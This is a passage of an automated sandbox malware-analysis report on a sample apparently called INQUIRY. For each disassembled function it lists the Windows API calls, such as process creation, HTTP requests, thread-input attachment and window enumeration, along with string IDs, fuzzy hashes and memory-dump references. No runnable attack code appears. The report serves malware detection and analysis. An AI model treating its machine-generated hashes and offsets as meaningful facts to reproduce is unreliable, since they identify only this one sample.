                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 1536045017-1403004172
                                                                                              • Opcode ID: c95785b43f5b9b8672d8679e04efb536e2a7de3848668be7d336e8baab205cce
                                                                                              • Instruction ID: 6cbc8f35cde5411bdd1fb6ee1e89ba414f136011e8c7f0555ad707e60e253ad6
                                                                                              • Opcode Fuzzy Hash: c95785b43f5b9b8672d8679e04efb536e2a7de3848668be7d336e8baab205cce
                                                                                              • Instruction Fuzzy Hash: 2B21C5B5A00208BFDF01EBE4CC85EFEBBB8EF55300F504116BA11972A1DB755855DB20
                                                                                              Function 00A69163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32 ref: 00A6916F
                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00A69184
                                                                                              • _wcscmp.LIBCMT ref: 00A69196
                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A69211
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                              • API String ID: 1704125052-3381328864
                                                                                              • Opcode ID: 8df285f39b97e09b716b1377199430de0a8ea63c7fcf31c17bf086bfc35ab637
                                                                                              • Instruction ID: e182552027c9f7b04ae83afe886768f6d9a8054186f7443de22b1ade2fccc580
                                                                                              • Opcode Fuzzy Hash: 8df285f39b97e09b716b1377199430de0a8ea63c7fcf31c17bf086bfc35ab637
                                                                                              • Instruction Fuzzy Hash: 0C11C676288307BAFA112674DC1BEEB3BBCAB15720F31052BFA10E54D1FF7168515A94
                                                                                              Function 00A888AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 00A888D7
                                                                                              • CoInitialize.OLE32(00000000), ref: 00A88904
                                                                                              • CoUninitialize.OLE32 ref: 00A8890E
                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00A88A0E
                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00A88B3B
                                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00AA2C0C), ref: 00A88B6F
                                                                                              • CoGetObject.OLE32(?,00000000,00AA2C0C,?), ref: 00A88B92
                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 00A88BA5
                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A88C25
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A88C35
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 2395222682-0
                                                                                              • Opcode ID: 512d357158c1d4bbff0c58349506f774a10dd8a9a893373515a36fdee3adc07e
                                                                                              • Instruction ID: cfea55028db173b913cb7a78e04e2d09ebc7badf9ed1d6fce4f27b9b6168ff7e
                                                                                              • Opcode Fuzzy Hash: 512d357158c1d4bbff0c58349506f774a10dd8a9a893373515a36fdee3adc07e
                                                                                              • Instruction Fuzzy Hash: ACC112B1608305AFC700EF68C88496BB7E9FF89348F40495DF98A9B251DB75ED06CB52
                                                                                              Function 00A77990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00A77A6C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafeVartype
                                                                                              • String ID:
                                                                                              • API String ID: 1725837607-0
                                                                                              • Opcode ID: 67e45d00a77aedad430341bd1707edbb53b91458f9041df523c993fe87f4f9dd
                                                                                              • Instruction ID: a8041b36332dff12f16e4b56abd2203d2c0beb573a049d98447e2e15a6478bcf
                                                                                              • Opcode Fuzzy Hash: 67e45d00a77aedad430341bd1707edbb53b91458f9041df523c993fe87f4f9dd
                                                                                              • Instruction Fuzzy Hash: 34B19D71A0420A9FDB01DFA4CC95BBEB7F4EF49321F20C429E649EB251D734A941CB91
                                                                                              Function 00A711CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00A711F0
                                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A70268,?,00000001), ref: 00A71204
                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00A7120B
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A70268,?,00000001), ref: 00A7121A
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A7122C
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A70268,?,00000001), ref: 00A71245
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A70268,?,00000001), ref: 00A71257
                                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A70268,?,00000001), ref: 00A7129C
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00A70268,?,00000001), ref: 00A712B1
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00A70268,?,00000001), ref: 00A712BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                              • String ID:
                                                                                              • API String ID: 2156557900-0
                                                                                              • Opcode ID: 09ccca895183c002d0c3b8808d89d2c218db66959f914b4ee3e12ab7bdb73dc6
                                                                                              • Instruction ID: b2f8bbfd3e05cb6ea9addd4db0d9e1017567ef0666efd80421af6b2798eab8ba
                                                                                              • Opcode Fuzzy Hash: 09ccca895183c002d0c3b8808d89d2c218db66959f914b4ee3e12ab7bdb73dc6
                                                                                              • Instruction Fuzzy Hash: A9317175601704BFDF20DF98EC88FA977E9EB59311F20C126F909D61A1EB749D418B90
                                                                                              Function 00A1FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A1FAA6
                                                                                              • OleUninitialize.OLE32(?,00000000), ref: 00A1FB45
                                                                                              • UnregisterHotKey.USER32(?), ref: 00A1FC9C
                                                                                              • DestroyWindow.USER32(?), ref: 00A545D6
                                                                                              • FreeLibrary.KERNEL32(?), ref: 00A5463B
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A54668
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                              • String ID: close all
                                                                                              • API String ID: 469580280-3243417748
                                                                                              • Opcode ID: 1a3249e7c172d0af51bb413b9771a7ae39c29de7e8cda2aa16fadee6d4d55b8c
                                                                                              • Instruction ID: f7cbd83d2388c230bd2641816c0f991801f2d2992921a031b4af099a268805c9
                                                                                              • Opcode Fuzzy Hash: 1a3249e7c172d0af51bb413b9771a7ae39c29de7e8cda2aa16fadee6d4d55b8c
                                                                                              • Instruction Fuzzy Hash: 82A18134705212CFCB19EF14CA95BA9F364BF09755F1442ADE80AAB261DB30ED96CF90
                                                                                              Function 00A6A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnumChildWindows.USER32(?,00A6A439), ref: 00A6A377
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChildEnumWindows
                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                              • API String ID: 3555792229-1603158881
                                                                                              • Opcode ID: b327d15c03f3ba1ee4503568e6b0fc162b5431324202449d7c5c634b4097db34
                                                                                              • Instruction ID: 021a0b2f49fa15933d412c0f805c86e291a81d4e16e323362a9567bcde86575e
                                                                                              • Opcode Fuzzy Hash: b327d15c03f3ba1ee4503568e6b0fc162b5431324202449d7c5c634b4097db34
                                                                                              • Instruction Fuzzy Hash: DF91A331A04606AACB08DFB0C552BEEFBB8FF24340F549119E85AB7251DF316999CF91
                                                                                              Function 00A12E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00A12EAE
                                                                                                • Part of subcall function 00A11DB3: GetClientRect.USER32(?,?), ref: 00A11DDC
                                                                                                • Part of subcall function 00A11DB3: GetWindowRect.USER32(?,?), ref: 00A11E1D
                                                                                                • Part of subcall function 00A11DB3: ScreenToClient.USER32(?,?), ref: 00A11E45
                                                                                              • GetDC.USER32 ref: 00A4CD32
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A4CD45
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00A4CD53
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00A4CD68
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00A4CD70
                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A4CDFB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                              • String ID: U
                                                                                              • API String ID: 4009187628-3372436214
                                                                                              • Opcode ID: dcaf38347a3a165ce989006a5a84b9a624a43f382487031cc2bbc1312cf6e664
                                                                                              • Instruction ID: b9672c3b2f85054ac2231a17c2dc1709eb6d603a9d997d4cd833bdebdd6d8308
                                                                                              • Opcode Fuzzy Hash: dcaf38347a3a165ce989006a5a84b9a624a43f382487031cc2bbc1312cf6e664
                                                                                              • Instruction Fuzzy Hash: 5C71C135901205DFCF61CF64C884AEA7FB5FF88360F14427AED5A9A2A6D731C891DB60
                                                                                              Function 00A81A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A81A50
                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A81A7C
                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00A81ABE
                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A81AD3
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A81AE0
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00A81B10
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00A81B57
                                                                                                • Part of subcall function 00A82483: GetLastError.KERNEL32(?,?,00A81817,00000000,00000000,00000001), ref: 00A82498
                                                                                                • Part of subcall function 00A82483: SetEvent.KERNEL32(?,?,00A81817,00000000,00000000,00000001), ref: 00A824AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                              • String ID:
                                                                                              • API String ID: 2603140658-3916222277
                                                                                              • Opcode ID: 6cc6c19b3b5bcbe8205b36220d2f94b8a47856c14a2c4bc1a74a8bbf9481ef2c
                                                                                              • Instruction ID: aeec4ef480ae0fefde3a0248a0f01d78095d0fab8779e24f3ccc0d90940a6e8f
                                                                                              • Opcode Fuzzy Hash: 6cc6c19b3b5bcbe8205b36220d2f94b8a47856c14a2c4bc1a74a8bbf9481ef2c
                                                                                              • Instruction Fuzzy Hash: 464151B1601219BFEB15AF90CC89FFB7BACFF08354F004126F9059A141EB749E569BA0
                                                                                              Function 00A88C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A9F910), ref: 00A88D28
                                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A9F910), ref: 00A88D5C
                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A88ED6
                                                                                              • SysFreeString.OLEAUT32(?), ref: 00A88F00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                              • String ID:
                                                                                              • API String ID: 560350794-0
                                                                                              • Opcode ID: 256558fc720db08bfcaa7cdf38dc7f4a112df556fc4043af96c93d194cbcba66
                                                                                              • Instruction ID: 20c0f49d920591360d34f2fc9aaf9c1fe96193b0696e28089b25a04c970ac056
                                                                                              • Opcode Fuzzy Hash: 256558fc720db08bfcaa7cdf38dc7f4a112df556fc4043af96c93d194cbcba66
                                                                                              • Instruction Fuzzy Hash: 24F11971A00209EFDF14EF94C884EAEB7B9FF49314F148498F905AB251DB35AE46CB51
                                                                                              Function 00A8F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A8F6B5
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A8F848
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A8F86C
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A8F8AC
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A8F8CE
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A8FA4A
                                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00A8FA7C
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A8FAAB
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A8FB22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4090791747-0
                                                                                              • Opcode ID: fc39c15b9dce067d432027ae4be827321d2f3fa74ad783f0011574a64035887f
                                                                                              • Instruction ID: f5919a38f0029aa97f9de983c5131ebc64a71ddf60039b520375ebdabbc8e506
                                                                                              • Opcode Fuzzy Hash: fc39c15b9dce067d432027ae4be827321d2f3fa74ad783f0011574a64035887f
                                                                                              • Instruction Fuzzy Hash: ACE1CF31604301AFDB14EF24C991B6ABBE5EF85354F14896DF8999B2A2CB31EC41CB52
                                                                                              Function 00A74CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A73697,?), ref: 00A7468B
                                                                                                • Part of subcall function 00A7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A73697,?), ref: 00A746A4
                                                                                                • Part of subcall function 00A74A31: GetFileAttributesW.KERNEL32(?,00A7370B), ref: 00A74A32
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00A74D40
                                                                                              • _wcscmp.LIBCMT ref: 00A74D5A
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00A74D75
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 793581249-0
                                                                                              • Opcode ID: 8a0ed293621737558b03f3a2e19c14869f3a8d1f183e91289c065e59bf163a49
                                                                                              • Instruction ID: 17a1bebd542146c7d818361a80f365eb352e4305ad92cb74855a15416fc0cfc8
                                                                                              • Opcode Fuzzy Hash: 8a0ed293621737558b03f3a2e19c14869f3a8d1f183e91289c065e59bf163a49
                                                                                              • Instruction Fuzzy Hash: 805164B25083459BC724DBA0DD819DFB3ECAF88350F40892EF689D3152EF34A588C766
                                                                                              Function 00A98645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A986FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InvalidateRect
                                                                                              • String ID:
                                                                                              • API String ID: 634782764-0
                                                                                              • Opcode ID: aee42792f1910ae9a30c9c2f9ec650731322edfb3192a7c8513ea1e1894243df
                                                                                              • Instruction ID: 59f6dc488658bbc7a09cc0cd0c455abe1ba9c2550447463bbbfd0b5df3c1e803
                                                                                              • Opcode Fuzzy Hash: aee42792f1910ae9a30c9c2f9ec650731322edfb3192a7c8513ea1e1894243df
                                                                                              • Instruction Fuzzy Hash: 77519030700244BEEF209F68CC89FAD7BE5EB06760F604116FA51EA1A1CF79E990DB50
                                                                                              Function 00A12B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00A4C2F7
                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A4C319
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A4C331
                                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00A4C34F
                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A4C370
                                                                                              • DestroyIcon.USER32(00000000), ref: 00A4C37F
                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A4C39C
                                                                                              • DestroyIcon.USER32(?), ref: 00A4C3AB
                                                                                                • Part of subcall function 00A9A4AF: DeleteObject.GDI32(00000000), ref: 00A9A4E8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                              • String ID:
                                                                                              • API String ID: 2819616528-0
                                                                                              • Opcode ID: 75b0591a2406aa11cc6f084258bd982b59e1fcadb9c401a1132171c982cd9b90
